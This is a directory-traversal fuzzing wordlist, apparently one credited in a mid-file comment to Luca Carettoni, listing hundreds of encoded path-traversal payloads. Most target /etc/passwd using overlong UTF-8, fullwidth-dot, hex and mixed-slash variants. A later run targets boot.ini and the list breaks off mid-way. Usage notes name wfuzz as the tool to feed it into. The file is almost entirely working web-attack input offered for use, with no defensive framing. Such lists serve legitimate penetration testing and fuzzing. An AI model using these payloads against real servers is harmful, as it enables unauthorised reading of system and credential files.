-%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e//etc/passwd -%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e//etc/passwd -%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e//etc/passwd -%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e//etc/passwd -%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e//etc/passwd -%uff0e%uff0e%u2215/etc/passwd -%uff0e%uff0e%u2215%uff0e%uff0e%u2215/etc/passwd -%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215/etc/passwd -%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215/etc/passwd -%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215/etc/passwd -%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215/etc/passwd -%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215/etc/passwd -%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215/etc/passwd -..%u2216/etc/passwd -..%u2216..%u2216/etc/passwd -..%u2216..%u2216..%u2216/etc/passwd -..%u2216..%u2216..%u2216..%u2216/etc/passwd -..%u2216..%u2216..%u2216..%u2216..%u2216/etc/passwd -..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216/etc/passwd -..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216/etc/passwd -..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216/etc/passwd -..%uEFC8/etc/passwd -..%uEFC8..%uEFC8/etc/passwd -..%uEFC8..%uEFC8..%uEFC8/etc/passwd -..%uEFC8..%uEFC8..%uEFC8..%uEFC8/etc/passwd -..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8/etc/passwd -..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8/etc/passwd -..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8/etc/passwd -..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8/etc/passwd -..%uF025/etc/passwd -..%uF025..%uF025/etc/passwd -..%uF025..%uF025..%uF025/etc/passwd -..%uF025..%uF025..%uF025..%uF025/etc/passwd -..%uF025..%uF025..%uF025..%uF025..%uF025/etc/passwd -..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025/etc/passwd -..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025/etc/passwd -..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025/etc/passwd -%uff0e%uff0e\/etc/passwd -%uff0e%uff0e\%uff0e%uff0e\/etc/passwd -%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\/etc/passwd -%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\/etc/passwd -%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\/etc/passwd -%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\/etc/passwd -%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\/etc/passwd -%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\/etc/passwd -%uff0e%uff0e%u2216/etc/passwd -%uff0e%uff0e%u2216%uff0e%uff0e%u2216/etc/passwd -%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216/etc/passwd -%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216/etc/passwd -%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216/etc/passwd -%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216/etc/passwd -%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216/etc/passwd -%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216/etc/passwd -..0x2f/etc/passwd -..0x2f..0x2f/etc/passwd -..0x2f..0x2f..0x2f/etc/passwd -..0x2f..0x2f..0x2f..0x2f/etc/passwd -..0x2f..0x2f..0x2f..0x2f..0x2f/etc/passwd -..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f/etc/passwd -..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f/etc/passwd -..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f/etc/passwd -0x2e0x2e//etc/passwd -0x2e0x2e/0x2e0x2e//etc/passwd -0x2e0x2e/0x2e0x2e/0x2e0x2e//etc/passwd -0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e//etc/passwd -0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e//etc/passwd -0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e//etc/passwd -0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e//etc/passwd -0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e//etc/passwd -0x2e0x2e0x2f/etc/passwd -0x2e0x2e0x2f0x2e0x2e0x2f/etc/passwd -0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f/etc/passwd -0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f/etc/passwd -0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f/etc/passwd -0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f/etc/passwd -0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f/etc/passwd -0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f/etc/passwd -..0x5c/etc/passwd -..0x5c..0x5c/etc/passwd -..0x5c..0x5c..0x5c/etc/passwd -..0x5c..0x5c..0x5c..0x5c/etc/passwd -..0x5c..0x5c..0x5c..0x5c..0x5c/etc/passwd -..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c/etc/passwd -..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c/etc/passwd -..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c/etc/passwd -0x2e0x2e\/etc/passwd -0x2e0x2e\0x2e0x2e\/etc/passwd -0x2e0x2e\0x2e0x2e\0x2e0x2e\/etc/passwd -0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\/etc/passwd -0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\/etc/passwd -0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\/etc/passwd -0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\/etc/passwd -0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\/etc/passwd -0x2e0x2e0x5c/etc/passwd -0x2e0x2e0x5c0x2e0x2e0x5c/etc/passwd -0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c/etc/passwd -0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c/etc/passwd -0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c/etc/passwd -0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c/etc/passwd -0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c/etc/passwd -0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c/etc/passwd -..%c0%2f/etc/passwd -..%c0%2f..%c0%2f/etc/passwd -..%c0%2f..%c0%2f..%c0%2f/etc/passwd -..%c0%2f..%c0%2f..%c0%2f..%c0%2f/etc/passwd -..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f/etc/passwd -..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f/etc/passwd -..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f/etc/passwd -..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f/etc/passwd -%c0%2e%c0%2e//etc/passwd -%c0%2e%c0%2e/%c0%2e%c0%2e//etc/passwd -%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e//etc/passwd -%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e//etc/passwd -%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e//etc/passwd -%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e//etc/passwd -%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e//etc/passwd -%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e//etc/passwd -%c0%2e%c0%2e%c0%2f/etc/passwd -%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f/etc/passwd -%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f/etc/passwd -%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f/etc/passwd -%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f/etc/passwd -%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f/etc/passwd -%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f/etc/passwd -%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f/etc/passwd -..%c0%5c/etc/passwd -..%c0%5c..%c0%5c/etc/passwd -..%c0%5c..%c0%5c..%c0%5c/etc/passwd -..%c0%5c..%c0%5c..%c0%5c..%c0%5c/etc/passwd -..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c/etc/passwd -..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c/etc/passwd -..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c/etc/passwd -..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c/etc/passwd -%c0%2e%c0%2e\/etc/passwd -%c0%2e%c0%2e\%c0%2e%c0%2e\/etc/passwd -%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\/etc/passwd -%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\/etc/passwd -%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\/etc/passwd -%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\/etc/passwd -%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\/etc/passwd -%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\/etc/passwd -%c0%2e%c0%2e%c0%5c/etc/passwd -%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c/etc/passwd -%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c/etc/passwd -%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c/etc/passwd -%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c/etc/passwd -%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c/etc/passwd -%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c/etc/passwd -%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c/etc/passwd -///%2e%2e%2f/etc/passwd -///%2e%2e%2f%2e%2e%2f/etc/passwd -///%2e%2e%2f%2e%2e%2f%2e%2e%2f/etc/passwd -///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f/etc/passwd -///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f/etc/passwd -///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f/etc/passwd -///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f/etc/passwd -///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f/etc/passwd -\\\%2e%2e%5c/etc/passwd -\\\%2e%2e%5c%2e%2e%5c/etc/passwd -\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c/etc/passwd -\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c/etc/passwd -\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c/etc/passwd -\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c/etc/passwd -\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c/etc/passwd -\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c/etc/passwd -..///etc/passwd -..//..///etc/passwd -..//..//..///etc/passwd -..//..//..//..///etc/passwd -..//..//..//..//..///etc/passwd -..//..//..//..//..//..///etc/passwd -..//..//..//..//..//..//..///etc/passwd -..//..//..//..//..//..//..//..///etc/passwd -..////etc/passwd -..///..////etc/passwd -..///..///..////etc/passwd -..///..///..///..////etc/passwd -..///..///..///..///..////etc/passwd -..///..///..///..///..///..////etc/passwd -..///..///..///..///..///..///..////etc/passwd -..///..///..///..///..///..///..///..////etc/passwd -..\\/etc/passwd -..\\..\\/etc/passwd -..\\..\\..\\/etc/passwd -..\\..\\..\\..\\/etc/passwd -..\\..\\..\\..\\..\\/etc/passwd -..\\..\\..\\..\\..\\..\\/etc/passwd -..\\..\\..\\..\\..\\..\\..\\/etc/passwd -..\\..\\..\\..\\..\\..\\..\\..\\/etc/passwd -..\\\/etc/passwd -..\\\..\\\/etc/passwd -..\\\..\\\..\\\/etc/passwd -..\\\..\\\..\\\..\\\/etc/passwd -..\\\..\\\..\\\..\\\..\\\/etc/passwd -..\\\..\\\..\\\..\\\..\\\..\\\/etc/passwd -..\\\..\\\..\\\..\\\..\\\..\\\..\\\/etc/passwd -..\\\..\\\..\\\..\\\..\\\..\\\..\\\..\\\/etc/passwd -./\/.//etc/passwd -./\/././\/.//etc/passwd -./\/././\/././\/.//etc/passwd -./\/././\/././\/././\/.//etc/passwd -./\/././\/././\/././\/././\/.//etc/passwd -./\/././\/././\/././\/././\/././\/.//etc/passwd -./\/././\/././\/././\/././\/././\/././\/.//etc/passwd -./\/././\/././\/././\/././\/././\/././\/././\/.//etc/passwd -.\/\.\/etc/passwd -.\/\.\.\/\.\/etc/passwd -.\/\.\.\/\.\.\/\.\/etc/passwd -.\/\.\.\/\.\.\/\.\.\/\.\/etc/passwd -.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\/etc/passwd -.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\/etc/passwd -.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\/etc/passwd -.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\/etc/passwd -././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././..//etc/passwd -././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../..//etc/passwd -././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../..//etc/passwd -././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../..//etc/passwd -././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../..//etc/passwd -././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../..//etc/passwd -././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../../..//etc/passwd -././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../../../..//etc/passwd -.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\/etc/passwd -.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\/etc/passwd -.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\/etc/passwd -.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\..\/etc/passwd -.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\..\..\/etc/passwd -.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\..\..\..\/etc/passwd -.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\..\..\..\..\/etc/passwd -.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\..\..\..\..\..\/etc/passwd -./..//etc/passwd -./.././..//etc/passwd -./.././.././..//etc/passwd -./.././.././.././..//etc/passwd -./.././.././.././.././..//etc/passwd -./.././.././.././.././.././..//etc/passwd -./.././.././.././.././.././.././..//etc/passwd -./.././.././.././.././.././.././.././..//etc/passwd -.\..\/etc/passwd -.\..\.\..\/etc/passwd -.\..\.\..\.\..\/etc/passwd -.\..\.\..\.\..\.\..\/etc/passwd -.\..\.\..\.\..\.\..\.\..\/etc/passwd -.\..\.\..\.\..\.\..\.\..\.\..\/etc/passwd -.\..\.\..\.\..\.\..\.\..\.\..\.\..\/etc/passwd -.\..\.\..\.\..\.\..\.\..\.\..\.\..\.\..\/etc/passwd -.//..///etc/passwd -.//..//.//..///etc/passwd -.//..//.//..//.//..///etc/passwd -.//..//.//..//.//..//.//..///etc/passwd -.//..//.//..//.//..//.//..//.//..///etc/passwd -.//..//.//..//.//..//.//..//.//..//.//..///etc/passwd -.//..//.//..//.//..//.//..//.//..//.//..//.//..///etc/passwd -.//..//.//..//.//..//.//..//.//..//.//..//.//..//.//..///etc/passwd -.\\..\\/etc/passwd -.\\..\\.\\..\\/etc/passwd -.\\..\\.\\..\\.\\..\\/etc/passwd -.\\..\\.\\..\\.\\..\\.\\..\\/etc/passwd -.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\/etc/passwd -.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\/etc/passwd -.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\/etc/passwd -.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\/etc/passwd -# Directory Traversal Fuzzing Code -# Luca "ikki" Carettoni - v0.1 -# -# 847 attack vectors, 8 levels of recursion (Unix-like, Windows) -# -# Usage: replace boot.ini with the absolute URI of a local resource, then use -# your favourite web application fuzzer (e.g. wfuzz) - -../boot.ini -../../boot.ini -../../../boot.ini -../../../../boot.ini -../../../../../boot.ini -../../../../../../boot.ini -../../../../../../../boot.ini -../../../../../../../../boot.ini -..%2fboot.ini -..%2f..%2fboot.ini -..%2f..%2f..%2fboot.ini -..%2f..%2f..%2f..%2fboot.ini -..%2f..%2f..%2f..%2f..%2fboot.ini -..%2f..%2f..%2f..%2f..%2f..%2fboot.ini -..%2f..%2f..%2f..%2f..%2f..%2f..%2fboot.ini -..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fboot.ini -%2e%2e/boot.ini -%2e%2e/%2e%2e/boot.ini -%2e%2e/%2e%2e/%2e%2e/boot.ini -%2e%2e/%2e%2e/%2e%2e/%2e%2e/boot.ini -%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/boot.ini -%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/boot.ini -%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/boot.ini -%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/boot.ini -%2e%2e%2fboot.ini -%2e%2e%2f%2e%2e%2fboot.ini -%2e%2e%2f%2e%2e%2f%2e%2e%2fboot.ini -%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fboot.ini -%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fboot.ini 